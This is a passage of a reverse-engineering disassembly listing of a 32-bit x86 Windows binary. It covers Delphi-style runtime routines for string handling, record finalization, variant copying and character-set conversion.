mov eax, ebx
mov ecx, [ebx-4]
call sub_402660
mov edx, edi
mov eax, esi
mov ecx, [esi-4]
add edx, [ebx-4]
call sub_402660
pop eax
mov edx, edi
test edi, edi
jz short loc_4034CC
dec dword ptr [edi-8]
loc_4034CC: ; CODE XREF: sub_403470+57�j
call sub_40321C
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4034D5: ; CODE XREF: sub_403470+2�j
mov edx, ecx
jmp sub_40321C
; ---------------------------------------------------------------------------
loc_4034DC: ; CODE XREF: sub_403470+E�j
mov edx, ecx
jmp sub_40342C
sub_403470 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4034E4 proc near ; CODE XREF: sub_4083E0+27B�p
; sub_4083E0+298�p ...
push ebx
push esi
push edx
push eax
mov ebx, edx
xor eax, eax
loc_4034EC: ; CODE XREF: sub_4034E4+14�j
mov ecx, [esp+edx*4+10h]
test ecx, ecx
jz short loc_4034F7
add eax, [ecx-4]
loc_4034F7: ; CODE XREF: sub_4034E4+E�j
dec edx
jnz short loc_4034EC
call sub_40328C
push eax
mov esi, eax
loc_403502: ; CODE XREF: sub_4034E4+33�j
mov eax, [esp+ebx*4+14h]
mov edx, esi
test eax, eax
jz short loc_403516
mov ecx, [eax-4]
add esi, ecx
call sub_402660
loc_403516: ; CODE XREF: sub_4034E4+26�j
dec ebx
jnz short loc_403502
pop edx
pop eax
test edx, edx
jz short loc_403522
dec dword ptr [edx-8]
loc_403522: ; CODE XREF: sub_4034E4+39�j
call sub_40321C
pop edx
pop esi
pop ebx
pop eax
lea esp, [esp+edx*4]
jmp eax
sub_4034E4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403534 proc near ; CODE XREF: sub_403C30+30�p
; sub_406520+C�p ...
test eax, eax
jz short loc_40353A
retn
; ---------------------------------------------------------------------------
byte_403539 db 0 ; DATA XREF: sub_403534:loc_40353A�o
; ---------------------------------------------------------------------------
loc_40353A: ; CODE XREF: sub_403534+2�j
mov eax, offset byte_403539
retn
sub_403534 endp
; =============== S U B R O U T I N E =======================================
sub_403540 proc near ; CODE XREF: sub_4066D4+20�p
; sub_40670C+2A�p ...
arg_0 = dword ptr 4
push ebx
test eax, eax
jz short loc_403572
mov ebx, [eax-4]
test ebx, ebx
jz short loc_403572
dec edx
jl short loc_40356A
cmp edx, ebx
jge short loc_403572
loc_403553: ; CODE XREF: sub_403540+2C�j
sub ebx, edx
test ecx, ecx
jl short loc_403572
cmp ecx, ebx
jg short loc_40356E
loc_40355D: ; CODE XREF: sub_403540+30�j
add edx, eax
mov eax, [esp+4+arg_0]
call sub_4032B0
jmp short loc_40357B
; ---------------------------------------------------------------------------
loc_40356A: ; CODE XREF: sub_403540+D�j
xor edx, edx
jmp short loc_403553
; ---------------------------------------------------------------------------
loc_40356E: ; CODE XREF: sub_403540+1B�j
mov ecx, ebx
jmp short loc_40355D
; ---------------------------------------------------------------------------
loc_403572: ; CODE XREF: sub_403540+3�j
; sub_403540+A�j ...
mov eax, [esp+4+arg_0]
call sub_4031C8
loc_40357B: ; CODE XREF: sub_403540+28�j
pop ebx
retn 4
sub_403540 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_403580 proc near ; CODE XREF: sub_40A5A0+127�p
test eax, eax
jz short locret_4035DA
push ebx
push esi
push edi
push ebp
mov ebx, eax
mov esi, edx
mov edi, ecx
mov edx, [edx]
push edx
test edx, edx
jz short loc_403598
mov edx, [edx-4]
loc_403598: ; CODE XREF: sub_403580+13�j
dec edi
jge short loc_40359D
xor edi, edi
loc_40359D: ; CODE XREF: sub_403580+19�j
cmp edi, edx
jle short loc_4035A3
mov edi, edx
loc_4035A3: ; CODE XREF: sub_403580+1F�j
mov ebp, [ebx-4]
mov eax, esi
add edx, ebp
call sub_403624
pop eax
cmp eax, ebx
jnz short loc_4035B6
mov ebx, [esi]
loc_4035B6: ; CODE XREF: sub_403580+32�j
mov eax, [esi]
lea edx, [edi+ebp]
mov ecx, [eax-4]
sub ecx, edx
add edx, eax
add eax, edi
call sub_402660
mov eax, ebx
mov edx, [esi]
mov ecx, ebp
add edx, edi
call sub_402660
pop ebp
pop edi
pop esi
pop ebx
locret_4035DA: ; CODE XREF: sub_403580+2�j
retn
sub_403580 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4035DC proc near ; CODE XREF: sub_40A5A0+EE�p
; sub_40A5A0+FF�p ...
test eax, eax
jz short locret_403620
test edx, edx
jz short loc_403615
push ebx
push esi
push edi
mov esi, eax
mov edi, edx
mov ecx, [edi-4]
push edi
mov edx, [esi-4]
dec edx
js short loc_403610
mov al, [esi]
inc esi
sub ecx, edx
jle short loc_403610
loc_4035FC: ; CODE XREF: sub_4035DC+32�j
repne scasb
jnz short loc_403610
mov ebx, ecx
push esi
push edi
mov ecx, edx
repe cmpsb
pop edi
pop esi
jz short loc_403618
mov ecx, ebx
jmp short loc_4035FC
; ---------------------------------------------------------------------------
loc_403610: ; CODE XREF: sub_4035DC+17�j
; sub_4035DC+1E�j ...
pop edx
xor eax, eax
jmp short loc_40361D
; ---------------------------------------------------------------------------
loc_403615: ; CODE XREF: sub_4035DC+6�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_403618: ; CODE XREF: sub_4035DC+2E�j
pop edx
mov eax, edi
sub eax, edx
loc_40361D: ; CODE XREF: sub_4035DC+37�j
pop edi
pop esi
pop ebx
locret_403620: ; CODE XREF: sub_4035DC+2�j
retn
sub_4035DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403624 proc near ; CODE XREF: sub_40342C+21�p
; sub_40342C:loc_403464�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
xor edi, edi
test edx, edx
jz short loc_403679
mov eax, [ebx]
test eax, eax
jz short loc_40365A
cmp dword ptr [eax-8], 1
jnz short loc_40365A
sub eax, 8
add edx, 9
push eax
mov eax, esp
call sub_402584
pop eax
add eax, 8
mov [ebx], eax
mov [eax-4], esi
mov byte ptr [eax+esi], 0
jmp short loc_403682
; ---------------------------------------------------------------------------
loc_40365A: ; CODE XREF: sub_403624+11�j
; sub_403624+17�j
mov eax, edx
call sub_40328C
mov edi, eax
mov eax, [ebx]
test eax, eax
jz short loc_403679
mov edx, edi
mov ecx, [eax-4]
cmp ecx, esi
jl short loc_403674
mov ecx, esi
loc_403674: ; CODE XREF: sub_403624+4C�j
call sub_402660
loc_403679: ; CODE XREF: sub_403624+B�j
; sub_403624+43�j
mov eax, ebx
call sub_4031C8
mov [ebx], edi
loc_403682: ; CODE XREF: sub_403624+34�j
pop edi
pop esi
pop ebx
retn
sub_403624 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403688 proc near ; CODE XREF: sub_40A5A0+135�p
xor ecx, ecx
jmp loc_403690
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_403690: ; CODE XREF: sub_403688+2�j
push ebx
mov ebx, edx
mov edx, ecx
xor ecx, ecx
test ebx, ebx
jz short loc_4036A0
mov ecx, [ebx-4]
sub edx, ecx
loc_4036A0: ; CODE XREF: sub_403688+11�j
push ecx
call sub_404D23
pop ecx
mov edx, ebx
pop ebx
jmp sub_404CB8
sub_403688 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4036B0 proc near ; CODE XREF: sub_40A5A0+C6�p
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
push ebx
push esi
mov ebx, eax
mov esi, edx
mov eax, edx
call sub_4031C8
sub esp, 100h
mov eax, ebx
mov edx, esp
mov ecx, 0FFh
call sub_404BA8
mov eax, esi
mov edx, esp
call sub_4033EC
cmp [esp+108h+var_108], 0FFh
jnz short loc_403711
loc_4036E0: ; CODE XREF: sub_4036B0+5F�j
mov eax, ebx
mov edx, esp
mov ecx, 0FFh
call sub_404BA8
mov edx, esp
push 0
mov eax, esp
call sub_4033EC
mov eax, esi
mov edx, [esp+10Ch+var_10C]
call sub_40342C
mov eax, esp
call sub_4031C8
pop eax
cmp [esp+108h+var_108], 0FFh
jz short loc_4036E0
loc_403711: ; CODE XREF: sub_4036B0+2E�j
add esp, 100h
pop esi
pop ebx
retn
sub_4036B0 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_403760
loc_40371C: ; CODE XREF: sub_403760+1D�j
mov al, 1
jmp sub_4025D4
; END OF FUNCTION CHUNK FOR sub_403760
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_403724 proc near ; CODE XREF: sub_403760+2�j
; sub_403760+D�j ...
mov edx, [eax]
test edx, edx
jz short locret_403738
mov dword ptr [eax], 0
push eax
push edx
call sub_4011A8
pop eax
locret_403738: ; CODE XREF: sub_403724+4�j
retn
sub_403724 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40373C proc near ; CODE XREF: sub_40387C+7A�p
; UPX0:00409B8A�p
push ebx
push esi
mov ebx, eax
mov esi, edx
loc_403742: ; CODE XREF: sub_40373C+1C�j
mov eax, [ebx]
test eax, eax
jz short loc_403754
mov dword ptr [ebx], 0
push eax
call sub_4011A8
loc_403754: ; CODE XREF: sub_40373C+A�j
add ebx, 4
dec esi
jnz short loc_403742
pop esi
pop ebx
retn
sub_40373C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403760 proc near ; CODE XREF: sub_403970+81�p
; sub_403A8C+61�p
; FUNCTION CHUNK AT 0040371C SIZE 00000007 BYTES
test edx, edx
jz sub_403724
mov ecx, [edx-4]
shr ecx, 1
jz sub_403724
push ecx
push edx
push eax
call sub_4011A0
test eax, eax
jz loc_40371C
retn
sub_403760 endp
; =============== S U B R O U T I N E =======================================
sub_403784 proc near ; CODE XREF: sub_4037B0+85�p
; sub_409BA8+1D�p ...
xor ecx, ecx
push ebx
mov cl, [edx+1]
push esi
push edi
mov ebx, eax
lea esi, [edx+ecx+0Ah]
mov edi, [edx+ecx+6]
loc_403796: ; CODE XREF: sub_403784+24�j
mov edx, [esi]
mov eax, [esi+4]
add eax, ebx
mov edx, [edx]
call sub_403844
add esi, 8
dec edi
jg short loc_403796
pop edi
pop esi
pop ebx
retn
sub_403784 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4037B0 proc near ; CODE XREF: sub_4037B0+6F�p
; sub_403844+5�j
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
xor edx, edx
mov al, [esi]
mov dl, [esi+1]
xor ecx, ecx
cmp al, 0Ah
jz short loc_4037EF
cmp al, 0Bh
jz short loc_4037EF
cmp al, 0Ch
jz short loc_4037F9
cmp al, 0Dh
jz short loc_40380C
cmp al, 0Eh
jz short loc_40382A
cmp al, 0Fh
jz short loc_4037EF
cmp al, 11h
jz short loc_4037EF
mov al, 2
pop edi
pop esi
pop ebx
jmp sub_4025D4
; ---------------------------------------------------------------------------
loc_4037EF: ; CODE XREF: sub_4037B0+15�j
; sub_4037B0+1A�j ...
mov [ebx], ecx
add ebx, 4
dec edi
jg short loc_4037EF
jmp short loc_40383E
; ---------------------------------------------------------------------------
loc_4037F9: ; CODE XREF: sub_4037B0+1F�j
; sub_4037B0+58�j
mov [ebx], ecx
mov [ebx+4], ecx
mov [ebx+8], ecx
mov [ebx+0Ch], ecx
add ebx, 10h
dec edi
jg short loc_4037F9
jmp short loc_40383E
; ---------------------------------------------------------------------------
loc_40380C: ; CODE XREF: sub_4037B0+24�j
push ebp
mov ebp, edx
loc_40380F: ; CODE XREF: sub_4037B0+75�j
mov edx, [esi+ebp+0Ah]
mov eax, ebx
add ebx, [esi+ebp+2]
mov ecx, [esi+ebp+6]
mov edx, [edx]
call sub_4037B0
dec edi
jg short loc_40380F
pop ebp
jmp short loc_40383E
; ---------------------------------------------------------------------------
loc_40382A: ; CODE XREF: sub_4037B0+29�j
push ebp
mov ebp, edx
loc_40382D: ; CODE XREF: sub_4037B0+8B�j
mov eax, ebx
add ebx, [esi+ebp+2]
mov edx, esi
call sub_403784
dec edi
jg short loc_40382D
pop ebp
loc_40383E: ; CODE XREF: sub_4037B0+47�j
; sub_4037B0+5A�j ...
pop edi
pop esi
pop ebx
retn
sub_4037B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403844 proc near ; CODE XREF: sub_403784+1B�p
mov ecx, 1
jmp sub_4037B0
sub_403844 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403850 proc near ; CODE XREF: sub_4028BC+12�p
; sub_40387C+B9�p ...
xor ecx, ecx
push ebx
mov cl, [edx+1]
push esi
push edi
mov ebx, eax
lea esi, [edx+ecx+0Ah]
mov edi, [edx+ecx+6]
loc_403862: ; CODE XREF: sub_403850+24�j
mov edx, [esi]
mov eax, [esi+4]
add eax, ebx
mov edx, [edx]
call sub_403964
add esi, 8
dec edi
jg short loc_403862
mov eax, ebx
pop edi
pop esi
pop ebx
retn
sub_403850 endp
; =============== S U B R O U T I N E =======================================
sub_40387C proc near ; CODE XREF: sub_40387C+A3�p
; sub_403964+5�j ...
cmp ecx, 0
jz locret_403962
push eax
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
xor edx, edx
mov al, [esi]
mov dl, [esi+1]
cmp al, 0Ah
jz short loc_4038CC
cmp al, 0Bh
jz short loc_4038E6
cmp al, 0Ch
jz short loc_4038FD
cmp al, 0Dh
jz short loc_40390C
cmp al, 0Eh
jz short loc_40392A
cmp al, 0Fh
jz loc_403940
cmp al, 11h
jz loc_40394F
pop edi
pop esi
pop ebx
pop eax
mov al, 2
jmp sub_4025D4
; ---------------------------------------------------------------------------
loc_4038CC: ; CODE XREF: sub_40387C+1D�j
cmp ecx, 1
mov eax, ebx
jg short loc_4038DD
call sub_4031C8
jmp loc_40395E
; ---------------------------------------------------------------------------
loc_4038DD: ; CODE XREF: sub_40387C+55�j
mov edx, ecx
call sub_4031EC
jmp short loc_40395E
; ---------------------------------------------------------------------------
loc_4038E6: ; CODE XREF: sub_40387C+22�j
cmp ecx, 1
mov eax, ebx
jg short loc_4038F4
call sub_403724
jmp short loc_40395E
; ---------------------------------------------------------------------------
loc_4038F4: ; CODE XREF: sub_40387C+6F�j
mov edx, ecx
call sub_40373C
jmp short loc_40395E
; ---------------------------------------------------------------------------
loc_4038FD: ; CODE XREF: sub_40387C+27�j
; sub_40387C+8C�j
mov eax, ebx
add ebx, 10h
call sub_404054
dec edi
jg short loc_4038FD
jmp short loc_40395E
; ---------------------------------------------------------------------------
loc_40390C: ; CODE XREF: sub_40387C+2C�j
push ebp
mov ebp, edx
loc_40390F: ; CODE XREF: sub_40387C+A9�j
mov edx, [esi+ebp+0Ah]
mov eax, ebx
add ebx, [esi+ebp+2]
mov ecx, [esi+ebp+6]
mov edx, [edx]
call sub_40387C
dec edi
jg short loc_40390F
pop ebp
jmp short loc_40395E
; ---------------------------------------------------------------------------
loc_40392A: ; CODE XREF: sub_40387C+31�j
push ebp
mov ebp, edx
loc_40392D: ; CODE XREF: sub_40387C+BF�j
mov eax, ebx
add ebx, [esi+ebp+2]
mov edx, esi
call sub_403850
dec edi
jg short loc_40392D
pop ebp
jmp short loc_40395E
; ---------------------------------------------------------------------------
loc_403940: ; CODE XREF: sub_40387C+36�j
; sub_40387C+CF�j
mov eax, ebx
add ebx, 4
call sub_4047E4
dec edi
jg short loc_403940
jmp short loc_40395E
; ---------------------------------------------------------------------------
loc_40394F: ; CODE XREF: sub_40387C+3F�j
; sub_40387C+E0�j
mov eax, ebx
mov edx, esi
add ebx, 4
call sub_404248
dec edi
jg short loc_40394F
loc_40395E: ; CODE XREF: sub_40387C+5C�j
; sub_40387C+68�j ...
pop edi
pop esi
pop ebx
pop eax
locret_403962: ; CODE XREF: sub_40387C+3�j
retn
sub_40387C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403964 proc near ; CODE XREF: sub_403850+1B�p
; sub_40A050+77�p
mov ecx, 1
jmp sub_40387C
sub_403964 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403970 proc near ; CODE XREF: sub_403970+CF�p
; sub_403A8C+AC�p
push ebx
push esi
push edi
push ebp
mov ebx, eax
mov esi, edx
xor eax, eax
mov al, [ecx+1]
lea edi, [ecx+eax+0Ah]
mov ebp, [edi-4]
xor eax, eax
mov ecx, [edi-8]
push ecx
loc_40398A: ; CODE XREF: sub_403970+100�j
mov ecx, [edi+4]
sub ecx, eax
jle short loc_40399C
mov edx, eax
add eax, esi
add edx, ebx
call sub_402660
loc_40399C: ; CODE XREF: sub_403970+1F�j
mov eax, [edi+4]
mov edx, [edi]
mov edx, [edx]
mov cl, [edx]
cmp cl, 0Ah
jz short loc_4039DB
cmp cl, 0Bh
jz short loc_4039EC
cmp cl, 0Ch
jz short loc_4039FD
cmp cl, 0Dh
jz short loc_403A0E
cmp cl, 0Eh
jz short loc_403A2E
cmp cl, 0Fh
jz loc_403A47
cmp cl, 11h
jz loc_403A58
mov al, 2
pop ebp
pop edi
pop esi
pop ebx
jmp sub_4025D4
; ---------------------------------------------------------------------------
loc_4039DB: ; CODE XREF: sub_403970+38�j
mov edx, [esi+eax]
add eax, ebx
call sub_40321C
mov eax, 4
jmp short loc_403A69
; ---------------------------------------------------------------------------
loc_4039EC: ; CODE XREF: sub_403970+3D�j
mov edx, [esi+eax]
add eax, ebx
call sub_403760
mov eax, 4
jmp short loc_403A69
; ---------------------------------------------------------------------------
loc_4039FD: ; CODE XREF: sub_403970+42�j
lea edx, [esi+eax]
add eax, ebx
call sub_403D10
mov eax, 10h
jmp short loc_403A69
; ---------------------------------------------------------------------------
loc_403A0E: ; CODE XREF: sub_403970+47�j
xor ecx, ecx
mov cl, [edx+1]
push dword ptr [edx+ecx+2]
push dword ptr [edx+ecx+6]
mov ecx, [edx+ecx+0Ah]
mov ecx, [ecx]
lea edx, [esi+eax]
add eax, ebx
call sub_403A8C
pop eax
jmp short loc_403A69
; ---------------------------------------------------------------------------
loc_403A2E: ; CODE XREF: sub_403970+4C�j
xor ecx, ecx
mov cl, [edx+1]
mov ecx, [edx+ecx+2]
push ecx
mov ecx, edx
lea edx, [esi+eax]
add eax, ebx
call sub_403970
pop eax
jmp short loc_403A69
; ---------------------------------------------------------------------------
loc_403A47: ; CODE XREF: sub_403970+51�j
mov edx, [esi+eax]
add eax, ebx
call sub_4047FC
mov eax, 4
jmp short loc_403A69
; ---------------------------------------------------------------------------
loc_403A58: ; CODE XREF: sub_403970+5A�j
mov ecx, edx
mov edx, [esi+eax]
add eax, ebx
call sub_404284
mov eax, 4
loc_403A69: ; CODE XREF: sub_403970+7A�j
; sub_403970+8B�j ...
add eax, [edi+4]
add edi, 8
dec ebp
jnz loc_40398A
pop ecx
sub ecx, eax
jle short loc_403A85
lea edx, [ebx+eax]
add eax, esi
call sub_402660
loc_403A85: ; CODE XREF: sub_403970+109�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_403970 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403A8C proc near ; CODE XREF: sub_403970+B6�p
; sub_403A8C+98�p ...
arg_0 = dword ptr 4
push ebx
push esi
push edi
push ebp
mov ebx, eax
mov esi, edx
mov edi, ecx
mov ebp, [esp+10h+arg_0]
mov cl, [edi]
cmp cl, 0Ah
jz short loc_403AD2
cmp cl, 0Bh
jz short loc_403AE9
cmp cl, 0Ch
jz short loc_403AFD
cmp cl, 0Dh
jz short loc_403B11
cmp cl, 0Eh
jz short loc_403B32
cmp cl, 0Fh
jz loc_403B4F
cmp cl, 11h
jz loc_403B63
mov al, 2
pop ebp
pop edi
pop esi
pop ebx
jmp sub_4025D4
; ---------------------------------------------------------------------------
loc_403AD2: ; CODE XREF: sub_403A8C+13�j
; sub_403A8C+56�j
mov eax, ebx
mov edx, [esi]
call sub_40321C
add ebx, 4
add esi, 4
dec ebp
jnz short loc_403AD2
jmp loc_403B77
; ---------------------------------------------------------------------------
loc_403AE9: ; CODE XREF: sub_403A8C+18�j
; sub_403A8C+6D�j
mov eax, ebx
mov edx, [esi]
call sub_403760
add ebx, 4
add esi, 4
dec ebp
jnz short loc_403AE9
jmp short loc_403B77
; ---------------------------------------------------------------------------
loc_403AFD: ; CODE XREF: sub_403A8C+1D�j
; sub_403A8C+81�j
mov eax, ebx
mov edx, esi
call sub_403D10
add ebx, 10h
add esi, 10h
dec ebp
jnz short loc_403AFD
jmp short loc_403B77
; ---------------------------------------------------------------------------
loc_403B11: ; CODE XREF: sub_403A8C+22�j
xor ecx, ecx
mov cl, [edi+1]
lea edi, [edi+ecx+2]
loc_403B1A: ; CODE XREF: sub_403A8C+A2�j
mov eax, ebx
mov edx, esi
mov ecx, [edi+8]
push dword ptr [edi+4]
call sub_403A8C
add ebx, [edi]
add esi, [edi]
dec ebp
jnz short loc_403B1A
jmp short loc_403B77
; ---------------------------------------------------------------------------
loc_403B32: ; CODE XREF: sub_403A8C+27�j
; sub_403A8C+BF�j
mov eax, ebx
mov edx, esi
mov ecx, edi
call sub_403970
xor eax, eax
mov al, [edi+1]
add ebx, [edi+eax+2]
add esi, [edi+eax+2]
dec ebp
jnz short loc_403B32
jmp short loc_403B77
; ---------------------------------------------------------------------------
loc_403B4F: ; CODE XREF: sub_403A8C+2C�j
; sub_403A8C+D3�j
mov eax, ebx
mov edx, [esi]
call sub_4047FC
add ebx, 4
add esi, 4
dec ebp
jnz short loc_403B4F
jmp short loc_403B77
; ---------------------------------------------------------------------------
loc_403B63: ; CODE XREF: sub_403A8C+35�j
; sub_403A8C+E9�j
mov eax, ebx
mov edx, [esi]
mov ecx, edi
call sub_404284
add ebx, 4
add esi, 4
dec ebp
jnz short loc_403B63
loc_403B77: ; CODE XREF: sub_403A8C+58�j
; sub_403A8C+6F�j ...
pop ebp
pop edi
pop esi
pop ebx
retn 4
sub_403A8C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403B80 proc near ; CODE XREF: sub_403C0C+1A�p
var_810 = byte ptr -810h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFF800h
mov esi, ecx
mov ebx, edx
mov edi, eax
test ebx, ebx
jnz short loc_403B9D
mov eax, esi
call sub_4031C8
jmp short loc_403BFE
; ---------------------------------------------------------------------------
loc_403B9D: ; CODE XREF: sub_403B80+12�j
cmp ebx, 400h
jge short loc_403BCB
push 0
push 0
push 800h
lea eax, [esp+81Ch+var_810]
push eax
push ebx
push edi
push 0
push 0
call sub_401188 ; WideCharToMultiByte
mov ecx, eax
mov edx, esp
mov eax, esi
call sub_4032B0
jmp short loc_403BFE
; ---------------------------------------------------------------------------
loc_403BCB: ; CODE XREF: sub_403B80+23�j
push 0
push 0
push 0
push 0
push ebx
push edi
push 0
push 0
call sub_401188 ; WideCharToMultiByte
mov ebp, eax
mov eax, esi
mov ecx, ebp
xor edx, edx
call sub_4032B0
push 0
push 0
push ebp
mov eax, [esi]
push eax
push ebx
push edi
push 0
push 0
call sub_401188 ; WideCharToMultiByte
loc_403BFE: ; CODE XREF: sub_403B80+1B�j
; sub_403B80+49�j
add esp, 800h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_403B80 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403C0C proc near ; CODE XREF: sub_403ED4+12�p
; sub_409BA8+299�p
var_C = dword ptr -0Ch
push ebx
push esi
push 0
mov esi, edx
mov ebx, eax
mov [esp+0Ch+var_C], ebx
mov eax, [esp+0Ch+var_C]
push eax
call sub_4011B0
mov edx, eax
mov ecx, esi
mov eax, ebx
call sub_403B80
pop edx
pop esi
pop ebx
retn
sub_403C0C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403C30 proc near ; CODE XREF: sub_403F04+7�p
; sub_409BA8+B6�p ...
var_810 = byte ptr -810h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFF800h
mov ebx, eax
mov eax, ebx
call sub_403424
mov esi, eax
mov eax, ebx
call sub_403424
cmp eax, 400h
jge short loc_403C7E
push 400h
lea eax, [esp+814h+var_810]
push eax
push esi
mov eax, ebx
call sub_403534
push eax
push 0
push 0
call sub_401168 ; MultiByteToWideChar
push eax
lea eax, [esp+814h+var_810]
push eax
call sub_401198
mov edi, eax
jmp short loc_403CA6
; ---------------------------------------------------------------------------
loc_403C7E: ; CODE XREF: sub_403C30+21�j
push 0
push 0
push esi
push ebx
push 0
push 0
call sub_401168 ; MultiByteToWideChar
mov ebp, eax
push ebp
push 0
call sub_401198
mov edi, eax
push ebp
push edi
push esi
push ebx
push 0
push 0
call sub_401168 ; MultiByteToWideChar
loc_403CA6: ; CODE XREF: sub_403C30+4C�j
mov eax, edi
add esp, 800h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_403C30 endp
; ---------------------------------------------------------------------------
align 4
mov al, 11h
jmp sub_4025D4
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_403CBC proc near ; CODE XREF: sub_403DAC+34�p
; sub_403E30+4A�p ...
mov al, 0Fh
jmp sub_4025D4
sub_403CBC endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_403CC4 proc near ; CODE XREF: sub_403CCC+22�j
; sub_403D10:loc_403D36�p ...
mov al, 10h
jmp sub_4025D4
sub_403CC4 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_403CCC proc near ; CODE XREF: sub_403E30+51�p
; sub_403ED4+19�p ...
xor edx, edx
mov dx, [eax]
test edx, 4000h
jnz short loc_403D01
cmp edx, 8
jb short loc_403D01
cmp edx, 100h
jz short loc_403CF4
cmp edx, 101h
jnz short loc_403D07
jmp off_40C3E8
; ---------------------------------------------------------------------------
loc_403CF4: ; CODE XREF: sub_403CCC+18�j
mov word ptr [eax], 0
add eax, 8
jmp sub_4031C8
; ---------------------------------------------------------------------------
loc_403D01: ; CODE XREF: sub_403CCC+B�j
; sub_403CCC+10�j
mov word ptr [eax], 0
retn
; ---------------------------------------------------------------------------
loc_403D07: ; CODE XREF: sub_403CCC+20�j
push eax
call sub_4011B8
retn
sub_403CCC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403D10 proc near ; CODE XREF: sub_403970+92�p
; sub_403A8C+75�p ...
; FUNCTION CHUNK AT 00403D5F SIZE 00000049 BYTES
cmp eax, edx
jz nullsub_1
cmp word ptr [eax], 8
jb short loc_403D48
push eax
push edx
cmp word ptr [eax], 100h
jz short loc_403D3E
cmp word ptr [eax], 101h
jz short loc_403D36
push eax
call sub_4011B8
jmp short loc_403D46
; ---------------------------------------------------------------------------
loc_403D36: ; CODE XREF: sub_403D10+1C�j
call off_40C3E8
jmp short loc_403D46
; ---------------------------------------------------------------------------
loc_403D3E: ; CODE XREF: sub_403D10+15�j
add eax, 8
call sub_4031C8
loc_403D46: ; CODE XREF: sub_403D10+24�j
; sub_403D10+2C�j
pop edx
pop eax
loc_403D48: ; CODE XREF: sub_403D10+C�j
cmp word ptr [edx], 8
jnb short loc_403D5F
sub_403D10 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_403D4E proc near ; CODE XREF: sub_403D10+5E�p
mov ecx, [edx]
mov [eax], ecx
mov ecx, [edx+8]
mov [eax+8], ecx
mov ecx, [edx+0Ch]
mov [eax+0Ch], ecx
retn
sub_403D4E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_403D10
loc_403D5F: ; CODE XREF: sub_403D10+3C�j
cmp word ptr [edx], 100h
jz short loc_403D7A
cmp word ptr [edx], 101h
jnz short loc_403D94
push eax
call sub_403D4E
pop eax
jmp off_40C3F0
; ---------------------------------------------------------------------------
loc_403D7A: ; CODE XREF: sub_403D10+54�j
mov edx, [edx+8]
or edx, edx
jz short loc_403D8B
mov ecx, [edx-8]
inc ecx
jle short loc_403D8B
lock inc dword ptr [edx-8]
loc_403D8B: ; CODE XREF: sub_403D10+6F�j
; sub_403D10+75�j
mov word ptr [eax], 100h
mov [eax+8], edx
retn
; ---------------------------------------------------------------------------
loc_403D94: ; CODE XREF: sub_403D10+5B�j
mov word ptr [eax], 0
push edx
push eax
call sub_4011C0
or eax, eax
jnz sub_403CC4
; END OF FUNCTION CHUNK FOR sub_403D10
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DAC proc near ; CODE XREF: sub_403E18+A�p
; sub_403E30+6F�p
var_10 = byte ptr -10h
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi
mov esi, edx
lea edi, [ebp+var_10]
push ecx
mov ecx, 4
rep movsd
pop ecx
mov esi, ecx
mov ebx, eax
lea eax, [ebp+var_10]
call sub_40405C
xor eax, eax
push ebp
push offset loc_403E08
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_10]
call off_40C3EC
sub_403DAC endp ; sp-analysis failed
lea edx, [ebp-10h]
mov eax, ebx
mov ecx, esi
call sub_403E30
xor eax, eax
pop edx
pop ecx
pop ecx
